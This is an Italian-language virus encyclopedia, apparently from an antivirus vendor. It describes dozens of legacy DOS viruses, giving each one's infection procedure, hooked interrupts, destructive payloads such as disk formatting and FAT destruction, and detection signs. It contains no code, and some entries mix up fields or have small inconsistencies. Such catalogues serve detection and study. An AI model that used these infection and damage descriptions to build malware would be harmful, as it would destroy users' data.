RNA#1. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 7.296 Byte (COM ed EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Cerca i file con estensione *.COM e *.EXE nel drive C:\. 2) Se il virus li trova, vengono cancellati (cancella quattro file alla volta). 3) Quando i file saranno stati cancellati, il virus creerα un file chiamato "ZSQA.TH" nel drive C:\. Danni: Cancella i file nel drive C:\. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 7.296 Byte. Note: 1) Non rimane in memoria. 2) RNA#1 intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [RNA#2] Nome del Virus: RNA#2. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 7.408 Byte (COM ed EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione*.COM ed *.EXE nel drive C:\. 2) Il virus infetta i file, quattro alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 7.408 Byte. Note: 1) Non rimane in memoria. 2) RNA#2 non intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Medical] Nome del Virus: Medical. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 189 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα stato infettato da Medical. Se "SI", continua a cercare un altro file con estensione *.COM. 3) Infetta un solo file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 189 Byte. Note: Non rimane in memoria. Medical non intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Bob] Nome del Virus: Bob. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 1.117 Byte (COM). Vettore PC agganciato: INT 8h. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα stato infettato da Bob. Se "SI" continua a cercare un file con estensione *.COM non infetto. 3) Infetta solo tre file alla volta. 4) In seguito controlla che la data di sistema corrisponda al giorno 7 settembre. Se "SI", il virus intercetta l'INT 8h e circa 5 minuti pi∙ tardi appare sullo schermo uno dei seguenti messaggi: "Bob Ross lives!", "Bob Ross is watching!", "Maybe he lives here....." eccetera... Danni: Se Φ il giorno 7 settembre appare un messaggio sullo schermo. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1.117 Byte. Note: 1) Non rimane in memoria. 2) Bob non intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Cannabis] Nome del Virus: Cannabis. Tipo di Virus: Infetta il settore di boot dei floppy Lunghezza del Virus: Nessuna. Vettore PC agganciato: INT 13h. Procedura eseguita: 1) Quando il sistema Φ avviato da un disco infetto, si verifica la diminuzione di 1K della memoria complessiva di sistema. 2) Intercetta quindi l'INT 13h. 3) All'accensione del computer, il dischetto viene infettato intercettando l'INT 13h. Danni: Nessuno. Metodo di rilevazione: La capacitα totale della memoria diminuisce di 1K Byte. Note: 1) Cannabis non intercetta l'INT 24h quando infetta il file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Daisy] Nome del Virus: Daisy. Tipo di Virus: Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Compare sullo schermo una faccia sorridente ed il messaggio: "Hi, I'm Crazy Daisy!... I'll format your HARD DISK! ... Say goodbye to your files!" 2) Il virus quindi cerca un file con estensione *.EXE nel drive A:\. 3) Controlla che sia giα stato infettato da Daisy. Se "SI", continua a cercare un altro file con estensione *.EXE non infetto. 4) Infetta tutti i file con estensione *.EXE nel drive A:\. 5) Blocca il sistema. Danni: 1) Quando tutti i file con estensione *.EXE nel A:\ drive sono stati infettati, il sistema si blocca. 2) Il virus sovrascrive il file originale, cosicchΘ la lunghezza dei file infetti non aumenta. 3) Quando viene eseguito un file infetto, compare uno dei seguenti messaggi: "Pretty day today - isn't it?" "Don't worry - sing a song!" "Life isn't easy!" "Don't halt your computer! Let's be friends!" Metodo di rilevazione: Nessuno. Note: 1) Non rimane in memoria. 2) Daisy non intercetta l'INT 24h quando infetta il file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Son of PSMPC] Nome del Virus: SON_OF_PSMPC. Tipo di Virus: Virus Generatore. Lunghezza del Virus: 17.741 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Si tratta di un "virus generatore." Quando si esegue PC-MPC A.CFG B.CFG..., si generano A.ASM B.ASM...,. che diventeranno virus dopo essere stati compilati. Metodo di rilevazione: Nessuno. Note: 1) Non rimane in memoria. 2) SON_OF_PSMPC non intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). 3) Questi nuovi file possono avere diverse funzioni come codificare od infettare il file COMMAND.COM. [Ear] Nome del Virus: EAR. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 1.024 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Il virus cerca un file con estensione *.EXE od un file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da EAR. Se "SI", continua a cercare un file con estensione *.COM o *.EXE non infetto. 3) Continua ad infettare i file con estensione *.COM ed *.EXE nella directory corrente ed in quella "madre" fino a quando tutti i file sono stati infettati. 4) Controlla quindi che la data di sistema corrisponda al 1░ del mese. Se "SI", appare sullo schermo il messaggio: " PHALON/SKISM 1992 [Ear-6] Alert! Where is the Auditory Canal located? 1. External Ear 2. Middle Ear 3. Inner Ear ", ed attende una risposta. 5) Se si preme "1" o "3" compare il seguente messaggio: " Wow, you own your ears! Please resume work.", ed Esegue il file originale. 6) Se si preme "2" compare il messaggio: "You obviously no nothing about ears. Try again after some study.", il programma quindi termina e non esegue il file originale. Danni: Se la data di sistema corrisponde al 1░ giorno del mese appare sullo schermo un messaggio. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1.024 Byte. Note: 1) Non rimane in memoria. 2) EAR non intercetta l'INT 24h quando infetta il file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Dir2-910] Nome del Virus: DIR2-910. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 1.024 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Quando il virus si carica in memoria cambia la struttura dei dati nella directory, cosicchΘ alcuni file eseguibili risulteranno legati tra loro. 2) Quando si esegue un file a cui Φ legato il virus DIR2-910, anche il virus viene eseguito. A questo punto pu≥ iniziare ad infettare altri file. 3) Il virus rimane in memoria ma non intercetta interrupt. Utilizza un'altra funzione per infettare i file. Infetta i file con estensione *.COM ed *.EXE quando sono "READ & WRITE". Danni: Quando tutti i file con estensione *.COM ed *.EXE sono stati infettati sul disco, non Φ pi∙ possibile eseguire un file dal disco. Metodo di rilevazione: Controlla il disco utilizzando CHKDSK.EXE. Se dei file sono crossed-linked alla stessa posizione, devono essere stati infettati. Note: DIR2-910 non intercetta l'INT 24h quando infetta il file. Omette gli errori di I/O (come per esempio protetto da scrittura). [INOK-2372] Nome del Virus: INOK-2372. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 2.372 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Quando viene eseguito il virus, le successive due funzioni sono selezionate casualmente. a) Cerca un file con estensione *.COM nella directory corrente. Controlla quindi che sia stato infettato da INOK- 2372. Se "SI", continua a cercare un altro file con estensione *.COM. Il virus infetta un solo file alla volta. Esegue poi il file originale. b) Crea un file chiamato "ICONKIN.COM" nella directory corrente, quindi lo esegue. Una volta eseguito, compare una finestra sullo schermo fino a quando non viene premuto un tasto, dopo breve tempo per≥ la finestra compare di nuovo. Danni: Nessuno. Metodo di rilevazione: 1) Il file infetto incrementa le sue dimensioni di 2.372 Byte. 2) Ricerca di una finestra inusuale. Note: 1) Non rimane in memoria. 2) INOK-2372 non intercetta l'INT 24h quando infetta il file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Multi-2] Nome del Virus: Multi-2. Tipo di Virus: Infetta la tabella delle partizioni, Virus da file ( file con estensione *.COM ed *.EXE). Lunghezza del Virus: Non valutabile. Vettore PC agganciato: INT 21h, INT 24h, INT 1Ch, INT 13h. Procedura eseguita: 1) Il virus diminuisce la memoria complessiva del sistema di 3K Byte quando il sistema viene avviato da un dischetto infetto. 2) Controlla quindi che sia in memoria; Se "NO", si inserisce in memoria negli ultimi 3 K Byte intercettando l'INT 21h e l'INT 1Ch. 3) Infetta i file alla loro esecuzione. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 927-1.000 Byte. Note: Multi-2 intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [BFD] Nome del Virus: BFD. Tipo di Virus: Virus da boot, Virus da file. Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: INT 13h, INT 24h. Procedura eseguita: 1) Il virus diminuisce la memoria complessiva di sistema di 2K Byte, quando il sistema viene avviato da un dischetto infetto. 2) Si carica negli ultimi 4K Byte di memoria. 3) Intercetta l'INT 13h. 4) Se viene acceso il computer, il virus in memoria infetta il settore di boot ed i file quando si leggono o si scrivono programmi o dischi non infetti. Danni: Sovrascrive i file originali, cosicchΘ la lunghezza dei file infetti non aumenta. Metodo di rilevazione: Nessuno. Note: 1) BFD intercetta l'INT 24h quando infetta i file od il settore di boot. Omette gli errori di I/O (come per esempio protetto da scrittura). [BFD-B] Nome del Virus: BFD-B. Tipo di Virus: Virus da file, Infetta il settore di Boot (Virus multipartito). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: INT 13h, INT 24h. Procedura eseguita: 1) Quando si esegue un file, il virus controlla che il settore boot dell'hard disk sia stato infettato. Se "NO", infetta il settore di boot. 2) Controlla quindi che sia in memoria. Se "NO", si carica in memoria agganciando l'INT 21h e l'INT 13h. Dopo che il virus Φ in memoria infetta il settore di boot ed i file quando si leggono o si scrivono programmi o dischi non infetti. Danni: Sovrascrive i file originali, cosicchΘ la lunghezza dei file infetti non aumenta. Metodo di rilevazione: Nessuno. Note: 1) BFD intercetta l'INT 24h quando infetta i file o i settori di boot. Omette gli errori di I/O (come per esempio protetto da scrittura). [XQR] Nome del Virus: XQR. Tipo di Virus: Infetta la tabella delle partizioni, Virus da file. Lunghezza del Virus: Non valutabile. Vettore PC agganciato: INT 21h, INT 24h, INT 13h, INT 8h. Procedura eseguita: 1) Il virus diminuisce la memoria complessiva di sistema di 4K Byte quando il sitema Φ avviato da un disco infetto. 2) Il virus si carica negli ultimi quattro 4K Byte della memoria. 3) Intercetta l'INT 13h. 4) Quando il computer Φ acceso normalmente il virus controlla che la data di sistema sia il giorno 4 Maggio. Se "SI", appare un messaggio sullo schermo: " XQR: Wherever, I love you Forever and ever! The beautiful memoria for ours in that summer time has been recorded in Computer history . Bon voyage, my dear XQR! " 5) Continua ad infettare ogni programma eseguito. Danni: Quando Φ domenica, il virus cambia l'impostazione della tastiera. Metodo di rilevazione: Controllare il funzionamento della tastiera. Note: XQR intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Bogus] Nome del Virus: BOGUS. Tipo di Virus: Infetta la tabella delle partizioni, Virus da file.. Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: INT 21h, INT 24h, INT 13h. Procedura eseguita: 1) Il virus diminuisce la memoria complessiva di sistema 4K Byte quando il sitema Φ avviato da un disco infetto. 2) Il virus si carica negli ultimi 4K Byte di memoria. 3) Intercetta l'INT 13h. 4) Continua ad infettare ogni programma eseguito. Danni: Se il numero dei file infetti Φ maggiore di 2.710, distrugge tutti i dati sull'hard disk. Metodo di rilevazione: Controlla che il file di testa sia l'INT 13h (AX=90 or 91). Note: 1) BOGUS intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). 2) Se il computer Φ avviato da un dischetto, Φ impossibile vedere l' hard disk. [Invol-1] Nome del Virus: INVOL-1. Tipo di Virus: Virus da file (EXE e SYS) . Lunghezza del Virus: 1.350/60 Byte (EXE), 2.720 Byte (SYS). Vettore PC agganciato: INT 21h. Procedura eseguita: File EXE: 1) Il virus cerca il primo comando di C:\CONFIG.SYS; se il comando Φ *.*=xxxx.yyy infetta il file. 2) Termina l'esecuzione del file originale. 3) Il file infetta quando viene eseguito un programma non infetto. File SYS: 1) Intercetta l'INT 21h e si carica in memoria. 2) Esegue il file originale. Danni: Controlla che sia il giorno 20. Se "SI", distrugge tutti i dati dell' hard disk. Metodo di rilevazione: I file con estensione *.EXE aumentano di 1.350 Byte, i file con estensione *.SYS aumentano di 2.720 Byte. Note: 1) INVOL-1 non intercetta l'INT 24h quando infetta il file. Omette gli errori di I/O (come per esempio protetto da scrittura). [August16] Nome del Virus: August16. Pseudonimo: Iron maiden. Tipo di Virus: Virus Parassita (infetta i file con estensione *.COM). Lunghezza del Virus: 636 Byte. Vettore PC agganciato: Int 21. Procedura eseguita: 1) Il virus controlla che i primi due file con estensione *.COM nella directory corrente siano stati infettati. 2) Se "NO" provvede ad infettarli. 3) Se "SI" controlla la directory corrente nel drive C:\ per vedere che possieda due file con estensione *.COM. 4) Se "SI" provvede ad infettarli. 5) Il file originale viene eseguito. Danni: 1) August16 sovrascrive il file originale per nascondere le variazioni di data ed ora nella lista delle directory. 2) Aggiunge due stringhe di testo ai file infetti: "*.COM AA", "=!=IRON MAIDEN." Metodo di rilevazione: 1) Aumentano di lunghezza i file con estensione *.COM. 2) Inatteso accesso al drive C:\. Note: August16 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [BkMonday] Nome del Virus: BKMonday. Pseudonimo: Virus 1055. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.055 Byte. Vettore PC agganciato: Int 21. Danni: Formatta i primi 240 cilindri del primo hard disk. Metodo di rilevazione: Sovrascrive il file originale in modo da nascondere le modifiche del file dopo l'infezione. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Devil's_Dance] Nome del Virus: Devil's_Dance. Pseudonimo: Virus 941. Tipo di Virus: Virus da file. Lunghezza del Virus: 941 Byte Vettore PC agganciato: Int 21. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Devil's_Dance monitorizza l'Int 9 (keyboard). Una funzione per la manopolazione del cursore Φ attivata quando vengono premuti 5 tasti ed in pi∙ il tasto Alt. Inoltre, se non viene digitato il tasto Alt, vengono cambiati gli attributi nella video-RAM dopo che qualsiasi altro tasto viene digitato. I nuovi attributi sono i seguenti: 09h (blu chiaro), 0ah (verde chiaro), obh (ciano chiaro), 0ch (rosso chiaro), 0dh (viola chiaro), oeh (giallo chiaro). Se non vengono digitati i tasti qui sopra citati, il virus non si manifesta. Se viene digitato Del, il virus mostra i caratteri color bianco. Il virus fa apparire il seguente messaggio: "Have you ever danced with the devil under the weak light of the moon?.... Pray for your disk...The Joker HAHAHAHAHAHA HAHAHAHA." Infine il virus controlla che ogni tasto venga digitato 2.500 volte. Se "si", il virus sovrascrive la tabella di partizione del primo hard disk e blocca il sistema. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Hero-394] Nome del Virus: HERO-394. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: I file infetti aumentano di 394 Byte. Danni: Nessuno. Metodo di rilevazione: Il virus controlla la data di sistema. Se Φ il primo giorno del mese, sullo schermo compare un codice confuso. [NOPX_2.1] Nome del Virus: NOPX_2.1. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: Fa aumentare la lunghezza dei file con estensione *.EXE e *.COM infetti di 1.686 Byte. Vettore PC agganciato: Int 21. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Il virus possiede dei bug (Errori nel calcolo del punto d'entrata) quindi alcuni file con estensione *.EXE infetti non possono essere eseguiti correttamente. Metodo di rilevazione: Aumenta la lunghezza dei file infetti di 1.686 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [NCU_LI] Nome del Virus: NCU_Li. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.690/1.670 Byte. Vettore PC agganciato: Int 21. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: Aumenta la lunghezza dei file infetti di 1.690/1.670 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Ghost-A] Nome del Virus: GHOST-A. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 330 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Se Φ gioved∞ ed il virus Φ in memoria, vengono cancellati i file esguiti. Il virus blocca il sistema. Metodo di rilevazione: Aumenta la lunghezza dei file infetti di 330 Byte. Note: 1) Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [VVF34] Nome del Virus: VVF34. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.614-1.624 Byte (EXE), 1.614 Byte (COM). Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Il virus intercetta l'INT 1Ch. Dopo che il virus Φ in memoria da 5 minuti e 15 file sono giα stati infettati, il virus disegna un ritratto al centro dello schermo. Il virus intercetta anche l'interrupt 9h (interrupt della tastiera). Compare il seguente messaggio quando l'utente digita un tasto: "Bu, Bu, Bu..." Metodo di rilevazione: I file infetti aumentano di 1.614/1.624 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Damage-B] Nome del Virus: DAMAGE-B. Pseudonimo: Nessuno. Tipo di Virus: Virus parassitico. Lunghezza del Virus: 1.110 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto che verrα eseguito. Danni: Il virus controlla la data di sistema. Se Φ marted∞, formatta l'hard disk. Metodo di rilevazione: I file infetti aumentano di 1.110 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Fam1] Nome del Virus: FAM1. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.063 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.036 Byte. Questo avviene solo con una scheda video MONO. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Malaise] Nome del Virus: MALAISE. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.335/1.365 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.335-1.365 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Walker] Nome del Virus: WALKER. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 3.845 Byte (EXE), 3.852 Byte (COM). Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno Metodo di rilevazione: Viene intercettato l'Interrupt 16. Sullo schermo compare occasionalmente un uomo che cammina per 14 secondi. I file infetti aumentano di 3.845/3.852 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Proto-T] Nome del Virus: PROTO-T. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 695 Byte (COM). Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "No", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 695 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [QMU] Nome del Virus: QMU. Pseudonimo: Nessuno. Tipo di Virus: Virus multipartito. Lunghezza del Virus: 1.513 Byte (COM). Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: L'hard disk non pu≥ essere avviato dopo che il contatore interno del virus raggiunge 100. Metodo di rilevazione: Fa aumentare la lunghezza dei file infetti di 1.513 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [492] Nome del Virus: 492. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 492 Byte (COM). Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Il virus controlla la data di sistema. Se Φ il giorno 14 ed Φ sabato, cancella tutti i dati sull' hard disk. Metodo di rilevazione: I file infetti aumentano di 492 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Reaper] Nome del Virus: REAPER. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.072 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "No", si carica in memoria i ntercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Reaper, una volta in memoria, cotrolla la data di sistema. Se Φ il giorno 21agosto, compare il seguente messaggio: "Reaper Man. (c) 92, Apache Warrior, ARCV Pres." Metodo di rilevazione: I file infetti aumentano di 1.072 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Jump4Joy] Nome del Virus: JUMP4JOY. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.273 Byte (COM). Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.273 Byte. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Aragorn] Nome del Virus: ARAGORN. Pseudonimo: Nessuno. Tipo di Virus: Boot Strap Sector Virus. Danni: Nessuno. Metodo di infezione: Sono infettati solo floppy disk in drive A. [Trash] Nome del Virus: TRASH. Pseudonimo: Nessuno. Tipo di Virus: Boot Strap Sector Virus. Lunghezza del Virus: 1.241 Byte. Danni: Il virus sovrascrive la Tabella delle partizioni. Metodo di rilevazione: Il virus non infetta tutti i file. Fa comparire sullo schermo il messaggio: "Warning!!! This program will zero (DESTROY) the Master Boot Record of your first hard disk. The purpose of this is to test the anti-virus software, so be sure you have installed your favorite protecting program before running this one! It is almost certain that it will fail to protect you anyway. Press any key to abort, or press Ctrl-Alt-Right Shift- F5 to proceed at your own risk." Il virus sovrascrivere la Tabella delle partizioni se vengono premuti Ctrl-Alt-Right Shift-F5. [Data Crime] Nome del Virus: Datacrime. Pseudonimo: 1168, Columbus Day. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.168 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "No", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Dopo il giorno 12 ottobre il virus effettua una formattazione a basso livello dell' hard disk. Metodo di rilevazione: Il virus infetta tutti i file con estensione *.COM tra i giorni 1░ aprile e 12 ottobre. Dopo il 12 ottobre, compare il seguente messaggio: "DATACRIME VIRUS Released:1 March 1989." ed il virus effettua una formattazione low level dell'hard disk. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Datacrime II] Nome del Virus: Datacrime II. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: Fa aumentare i file con estensione *.COM ed file con estensione *.EXE di 1.514 Byte. Danni: Dopo il giorno 12 ottobre il virus effettua una formattazione low-level del cilindro 0 dell'hard disk. Metodo di rilevazione: Tra i giorni 12 e 31 ottobre, escluso luned∞, compare il messaggio: "DATACRIME-2 VIRUS." Il virus esegue una formattazione low-level del cilindro 0 dell'hard disk.. Il sistema si blocca. [Marauder] Nome del Virus: Marauder. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: Fa aumentare i file con estensione *.COM di 860 Byte. Procedura eseguita: 1) Il virus ricerca nella cartella in uso un file con estensione *.COM. Una volta individuato un file, controlla che sia giα stato infettato dal virus Marauder. Se "NO", infetta il file. 2) Se "SI" cerca un altro file con estensione *.COM da infettare. b) Non infetta i file con estensione *.EXE. 3) Esegue il file originale. Danni: Il giorno 2 febbraio di ogni anno Marauder sovrascrive i file con la stringa: "=[Marauder] 1992 Hellraiser -Phalcon/Skism." Metodo di rilevazione: Quando viene eseguito un file infetto, il virus infetta il primo file con estensione *.COM non infetto nella directory corrente. Il giorno 2 febbraio di ogni anno, il virus sovrascrive tutti i file eseguiti con la stringa: " =[Aarauder] 1992 Hellraiser - Phalcon/skism." [Oropax] Nome del Virus: Oropax. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 2.756-2.800 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Infetta i file con estensione *.COM i quali aumentano di 2.756-2.800 Byte. Metodo di rilevazione: Il virus intercetta gli interrupt 20h, 21h, 27h. Se la data di sistema Φ successiva al giorno 1maggio 1987 e si tratta di un computer IBM-compatibile, l'interrupt 8h viene agganciato. Quando il virus Φ attivato, suona le canzoni "Stars", "Blue" e "Forty" una dopo l'altra ogni 8 minuti. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [dBASE] Nome del Virus: dBASE. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.864 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "No", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: I file con estensione *.COM aumentano di 1.864 Byte quando viene eseguito. A volte il virus causa l'arresto del sistema. Metodo di rilevazione: Virus intercetta l'INTerrupt 21h. Quando il virus si attiva, cambia i Byte bassi con quelli alti di ogni data file .DBF aperto. Il virus inoltre crea un file nascosto - "BUG.DAT" nella directory principale di ogni file con estensione *.DBF infetto. Note: Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Halloween] Nome del Virus: Halloween. Pseudonimo: Happy Halloween. Tipo di Virus: Virus da file. Lunghezza del Virus: N/A. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "No", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Il virus cerca un file eseguibile (prima un file con estensione *.EXE poi *.COM) nella directory corrente e procede ad infettarlo. Compare sullo schermo "Runtime error 002 at 0000:0511" se non viene trovato nessun file non infetto. Metodo di rilevazione: Il giorno 31 ottobre di ogni anno, il virus crea un file di 10KB e compare "Runtime error 150 at 0000:0AC8." Note: 1) Si carica in memoria. Appare un messaggio d'errore se c'Φ un errore I/O (come per esempio protetto da scrittura). [Kennedy] Nome del Virus: Kennedy. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 333 Byte. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "No", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. Danni: Il virus distrugge FAT. Metodo di rilevazione: I giorni 6 giugno, 8 novembre e 22 novembre, il virus mostra sullo schermo: "Kennedy is dead - long live the Dead Kennedys." Il virus procede a distruggere FAT. 